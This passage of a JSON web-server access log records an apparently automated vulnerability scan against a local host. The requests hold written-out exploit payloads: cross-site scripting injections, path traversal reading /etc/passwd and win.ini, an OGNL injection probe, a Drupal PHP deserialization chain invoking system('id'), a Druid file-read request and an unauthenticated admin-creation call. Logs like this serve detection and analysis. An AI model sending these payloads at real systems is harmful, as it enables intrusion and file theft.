/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/robomongo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /time.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/websocket/index.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?redirect=..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/webclient/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/mysql2i/mysql2i.func.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/.gitignore HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /document.php?modulepart=project&file=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nifi-api/access/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/admin/login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?m=user&c=Users&a=logout&referurl=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /robomongo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RDWeb/Pages/en-US/login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maxsite/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/examples/servlets/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/prostore/go.php?https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"297MFsBS6MGPKR3VpTMkzBzykOT.txt\x0D\x0Adixell-xweb500-filewrite","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/logo_extra_upload.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xxl-job-admin/toLogin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /addons/phpmailer/phpmailer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername=ThQ8yV&adminpassword=86w2DH&adminemail=test@test.com&adminname=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XmlPeek.aspx?dt=\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5CWindows\x5C\x5Cwin.ini&x=/validate.ashx?requri HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"dir=%2Fetc%2F&onlyFiles=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zabbix/index_sso.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/docs/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /template/custom/content-editor HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/jh-404-logger/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/openid-configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/examples/jsp/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /temp.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logo/297MFsBS6MGPKR3VpTMkzBzykOT.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"\x0D\x0A\x0D\x0A _CobblerXMLRPCInterface__make_token\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A cobbler\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SecMail/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"{\x22type\x22:\x22index\x22,\x22spec\x22:{\x22type\x22:\x22index\x22,\x22ioConfig\x22:{\x22type\x22:\x22index\x22,\x22firehose\x22:{\x22type\x22:\x22http\x22,\x22uris\x22:[\x22 file:///etc/passwd \x22]}},\x22dataSchema\x22:{\x22dataSource\x22:\x22sample\x22,\x22parser\x22:{\x22type\x22:\x22string\x22, \x22parseSpec\x22:{\x22format\x22:\x22regex\x22,\x22pattern\x22:\x22(.*)\x22,\x22columns\x22:[\x22a\x22],\x22dimensionsSpec\x22:{},\x22timestampSpec\x22:{\x22column\x22:\x22no_ such_ column\x22,\x22missingValue\x22:\x222010-01-01T00:00:00Z\x22}}}}},\x22samplerConfig\x22:{\x22numRows\x22:500,\x22timeoutMs\x22:15000}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /druid/indexer/v1/sampler?for=connect HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/manifests/files/joomla.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index_sso.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"{ \x22link\x22: [ { \x22value\x22: \x22link\x22, \x22options\x22: \x22O:24:\x5C\x22GuzzleHttp\x5C\x5CPsr7\x5C\x5CFnStream\x5C\x22:2:{s:33:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CPsr7\x5C\x5CFnStream\x5Cu0000methods\x5C\x22;a:1:{s:5:\x5C\x22close\x5C\x22;a:2:{i:0;O:23:\x5C\x22GuzzleHttp\x5C\x5CHandlerStack\x5C\x22:3:{s:32:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000handler\x5C\x22;s:2:\x5C\x22id\x5C\x22;s:30:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000stack\x5C\x22;a:1:{i:0;a:1:{i:0;s:6:\x5C\x22system\x5C\x22;}}s:31:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000cached\x5C\x22;b:0;}i:1;s:7:\x5C\x22resolve\x5C\x22;}}s:9:\x5C\x22_fn_close\x5C\x22;a:2:{i:0;r:4;i:1;s:7:\x5C\x22resolve\x5C\x22;}}\x22 } ], \x22_links\x22: { \x22type\x22: { \x22href\x22: \x22http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default\x22 } } }","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /node/1?_format=hal_json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"{\x22dashboard\x22:{\x22annotations\x22:{\x22list\x22:[{\x22name\x22:\x22Annotations & Alerts\x22,\x22enable\x22:true,\x22iconColor\x22:\x22rgba(0, 211, 255, 